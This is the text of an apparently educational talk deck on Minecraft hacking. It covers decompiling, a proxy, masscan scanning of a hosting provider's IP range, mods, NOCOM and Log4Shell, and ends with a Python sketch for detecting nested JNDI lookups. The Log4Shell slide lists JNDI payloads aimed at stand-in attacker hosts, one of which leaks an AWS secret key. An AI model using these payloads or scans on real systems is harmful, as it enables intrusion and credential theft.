Hacking Minecraft - for beginners
Hackersuli 2023
MC vs MC
Minecraft history
• First release 2011 November, Mojang Studios
• Best selling video game of all time!
• Originally written in Java
• Bought by Microsoft for US$2.5 billion in 2014
• 2020 - migrate all Mojang accounts to XBOX .... :(
My Minecraft history
• I started my first Minecraft game in 2022 Q4
• So far played ~15 hours as a regular player
• Probably spent more time on trying to figure out the hacks
LiveOverflow for President!
• https://www.youtube.com/watch?v=Ekcseve-mOg&t=13s
• Total length of playlist : 6 hours, 35 minutes, 54 seconds
Decompile
• Minecraft is protected by ProGuard (shrinker, optimizer, obfuscator)
• https://github.com/FabricMC/intermediary + yarn
• https://www.youtube.com/watch?v=_L-cSopvlVg
• ~/Desktop/minecraft/server-1.19.2.jar.src/aiy.java
• IntelliJ - after yarn runs
Run your own server
• java -Xms2G -Xmx2G -jar paper-1.19.2-307.jar
• fabric-example-mod - gradle - tasks - fabric - runServer
Network proxy
• pip3 install twisted quarry
• https://github.com/LiveOverflow/minecraft-hacked
• wiki.vg
• Question to audience: why /port not working ???
Scan for LiveOverflow server
• rent a server (or free Oracle) - masscan all Hetzner IP https://ipinfo.io/AS24940
• sudo masscan -p 25565 -oJ masscan_b.json --rate 1000 --banners xxx.xxx.0.0/16
• Don't make the mistake of running it only for 176.9.0.0/16 ....
• Or ... use this list: https://discord.com/channels/1037311964629717023/1053261545192308756/1054438326502969364
• After that, use a script which can grab Minecraft server status details
• https://jorianwoltjer.com/blog/post/hacking/playing-on-the-liveoverflow-minecraft-hacking-server
Scan for LiveOverflow server
• Filter for "Paper 1.19.2"
• Filter for Max Players 50
• There is the real server and a Rust-based proxy to filter out griefers, operated by Philip_DE
• You have to connect to the proxy, and it will "proxy" connect you to the real one
Connect to LiveOverflow
• You can double check if you found the real one by connecting to Discord server "LiveOverflow Community" and use /check IP
• Use Minecraft client version 1.19.2
• Use a legal client that you paid for, not something like Tlauncher
• Not the proxy you are looking for 👇
Human detected!
Fabric, loader, API, ...
Fabric is a lightweight, experimental modding toolchain for Minecraft
You need the Fabric installer to create the environment
And manually add the fabric-api into the mods directory
Fabric, loader, API, ...
Mixins are a powerful and important tool used in the Fabric ecosystem.
Their primary use case is modifying existing code in the base game, whether it be through injecting custom logic, removing mechanics, or modifying values.
https://github.com/SpongePowered/Mixin/wiki
The easy solution
https://github.com/JorianWoltjer/LiveOverflowMod/releases/download/1.19.2-1.0.3/liveoverflowmod-1.0.jar
https://github.com/JorianWoltjer/LiveOverflowMod/blob/master/src/main/java/com/jorianwoltjer/liveoverflowmod/helper/RoundPosition.java
https://github.com/JorianWoltjer/LiveOverflowMod/blob/master/src/main/java/com/jorianwoltjer/liveoverflowmod/mixin/PlayerPositionFullPacketMixin.java
The solution
public static double roundCoordinate(double n) {
    n = Math.round(n * 100) / 100d; // Round to 1/100th
    return Math.nextAfter(n, n + Math.signum(n)); // Fix floating point errors
}
Meteor client ...
NOCOM - ultimate coordinate exploit, 2018
YouTube: FitMC: The Fall of Minecraft's 2b2t
Step 1: Find a "crash" exploit by forcing the server to load tons of chunks
Step 2: Convince developers to "fix" the crash
Step 3: The new exploit worked like: they could get info of far away chunks whether it is already loaded or not
just use ML, probability association to link users with coordinates, months of development
follow users - adaptive tracking system
mirror 2b2t, with seed, recreates the "changes"
false flag operations, gaslighting
Log4Shell, 2021
Java - Log4j logging component critical vuln
FitMC: The Scariest Week in Minecraft History
${java:runtime}
${jndi:ldap://attacker-srv.com/foo}
${jndi:ldap://${env:AWS_SECRET_ACCESS_KEY}.attacker-srv.com/foo}
${${lower:j}ndi
${jndi:ldap://127.0.0.1#evilhost.com:1389/a}
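A detection sketch for the lookup strings on this slide, added here as an example (not code from the talk): it resolves nested lookups such as ${lower:j} inside-out before checking for jndi, and lists every host a parser could read from the target. The function names and the sample chat lines are constructed for illustration.

```python
import re

INNER = re.compile(r"\$\{([^${}]*)\}")  # innermost ${...}: no nested lookup inside

def normalize(text):
    """Resolve nested lookups inside-out; return (text, JNDI targets)."""
    targets = []
    def resolve(m):
        name, has_default, default = m.group(1).partition(":-")
        prefix, _, arg = name.partition(":")
        prefix = prefix.lower()
        if prefix == "jndi":
            targets.append(arg)
            return "<jndi>"
        if prefix in ("lower", "upper"):
            return getattr(arg, prefix)()   # apply str.lower / str.upper
        if has_default:             # ${env:UNSET:-j} and ${::-j} give "j"
            return default
        return f"<{prefix}:{arg}>"  # env, java, sys: leave a visible marker
    previous = None
    while previous != text:         # repeat until nothing is left to resolve
        previous, text = text, INNER.sub(resolve, text)
    return text, targets

def candidate_hosts(target):
    """Hosts a parser could read from the target: split on '#', drop ports."""
    authority = target.split("://", 1)[-1].split("/", 1)[0]
    return [re.sub(r":\d+$", "", part) for part in authority.split("#")]

def inspect(line):
    """Return None for a line without a JNDI lookup, else a finding dict."""
    text, targets = normalize(line)
    if not targets and "${jndi" not in text.lower():
        return None
    return {
        "targets": targets,
        "hosts": [h for t in targets for h in candidate_hosts(t)],
        "leaks_lookup": any("<env:" in t or "<sys:" in t for t in targets),
        "unterminated": not targets,
    }

# Constructed chat lines; the lookup strings are the ones from the slide.
SAMPLES = [
    "<Steve> anyone selling diamonds?",
    "<a> ${jndi:ldap://${env:AWS_SECRET_ACCESS_KEY}.attacker-srv.com/foo}",
    "<b> ${${lower:j}ndi",
    "<c> ${jndi:ldap://127.0.0.1#evilhost.com:1389/a}",
]
RESULTS = [inspect(s) for s in SAMPLES]
```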
X-ray mods
https://minecraft.fandom.com/wiki/Tutorials/Redstone_computers
My problem with Minecraft
We taught an entire generation that downloading and running JAR files from random servers is OK ...
Happy hacking
Questions, comments?

Hackersuli: Minecraft hacking for beginners